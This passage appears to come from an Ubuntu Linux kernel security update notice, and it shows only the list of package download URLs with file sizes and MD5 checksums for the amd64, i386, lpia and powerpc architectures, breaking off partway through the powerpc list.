http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb\n      Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb\n      Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   161072 faec6563ccef41e925482b36619fca7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    73750 53978367ed22b3daba246878064b72c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5: 17943372 803487f6122441604ec3062e7bb98228\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   128172 821c97524ce74e0685b135140c5261d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5:   674164 daade678beff67e96da61f42286bb8d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb\n      Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb\n      Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   148522 b96767af921427e880579659ba7b757a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   198810 76156647956f29c9e519aeac038c63bb\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    42148 931518b24b123d3749719c35b2b23759\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb\n      Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   172836 8b15eb5579853f45dc49055351df4225\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    28366 0301ac544cf27b3dce660787d7575804\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   141998 930123e6b57798468d7085ae9f549150\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    46410 80945eba79f53965effd546d23a8560b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    44068 98817942a8188bd9281def20a1d327bb\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39270 47f890e2a1418595d92858350aa16475\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   149292 930001a305b0f78060f3472fe46cde00\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   784762 523b94315bff20137df79c5308abd5b7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24820746 adc5365726ba88565ad89953707bd012\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb\n      Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33\n    